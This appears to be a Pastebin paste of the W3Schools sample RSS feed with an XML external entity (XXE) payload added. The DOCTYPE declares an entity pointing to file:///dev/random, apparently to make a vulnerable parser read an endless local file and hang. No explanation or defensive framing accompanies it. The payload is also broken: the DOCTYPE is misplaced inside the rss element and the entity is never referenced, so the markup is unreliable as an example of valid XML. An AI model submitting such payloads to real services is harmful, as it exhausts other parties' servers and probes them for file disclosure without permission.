Advertisement
Guest User

Untitled

a guest
Apr 20th, 2019
98
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.65 KB | None | 0 0
  1. <?xml version="1.0" encoding="UTF-8" ?>
  2. <rss version="2.0">
  3. <!DOCTYPE foo [
  4. <!ELEMENT foo ANY >
  5. <!ENTITY xxe SYSTEM "file:///dev/random" >]>
  6.  
  7. <channel>
  8. <title>W3Schools Home Page</title>
  9. <link>https://www.w3schools.com</link>
  10. <description>Free web building tutorials</description>
  11. <item>
  12. <title>RSS Tutorial</title>
  13. <link>https://www.w3schools.com/xml/xml_rss.asp</link>
  14. <description>New RSS tutorial on W3Schools</description>
  15. </item>
  16. <item>
  17. <title>XML Tutorial</title>
  18. <link>https://www.w3schools.com/xml</link>
  19. <description>New XML tutorial on W3Schools</description>
  20. </item>
  21. </channel>
  22.  
  23. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement